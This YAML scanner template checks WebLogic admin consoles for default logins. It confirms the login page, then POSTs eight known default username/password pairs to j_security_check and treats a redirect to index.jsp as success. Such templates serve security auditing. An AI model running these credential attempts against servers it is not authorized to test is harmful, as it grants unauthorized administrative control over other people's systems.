id: weblogic-weak-login

info:
  name: WebLogic Default Login
  author: pdteam
  description: WebLogic default login credentials were discovered.
  severity: high
  verified: false
  reference:
    - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
    - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/

rules:
    r11:
        request:
            method: GET
            path: /console/login/LoginForm.jsp
        expression: |
            response.status == 200 && "WebLogic Server Version: (.*?)<".bmatches(response.body)
        stop_if_mismatch: true
    r0:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r1:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r2:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r3:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r4:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r5:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=admin&j_password=12345678&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r6:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=admin&j_password=security&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
    r7:
        request:
            method: POST
            path: /console/j_security_check
            body: j_username=system&j_password=password&j_character_encoding=UTF-8
        expression: response.status == 302 && response.headers["location"].icontains("/console/index.jsp")
        stop_if_match: true
expression: r11() && (r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7())